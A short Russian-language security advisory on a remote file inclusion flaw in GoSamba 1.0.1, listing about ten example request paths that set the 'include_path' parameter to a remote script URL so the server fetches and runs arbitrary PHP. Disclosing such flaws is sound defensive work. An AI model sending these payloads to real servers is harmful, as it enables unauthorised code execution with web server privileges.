Программа: GoSamba 1.0.1

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «include_path» множественными сценариями. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

/inc_group.php?include_path=http://localhost/scripts/020.txt?
/inc_manager.php?include_path=http://localhost/scripts/020.txt?
/inc_newgroup.php.php?include_path=http://localhost/scripts/020.txt?
/inc_smb_conf.php?include_path=http://localhost/scripts/020.txt?
/inc_user.php?include_path=http://localhost/scripts/020.txt?
/main.php?include_path=http://localhost/scripts/020.txt?
/include/HTML_oben.php?include_path=http://localhost/scripts/020.txt?
/include/inc_freigabe.php?include_path=http://localhost/scripts/020.txt?
/include/inc_freigabe1.php?include_path=http://localhost/scripts/020.txt?
/include/inc_freigabe3.php?include_path=http://localhost/scripts/020.txt?



Оставить мнение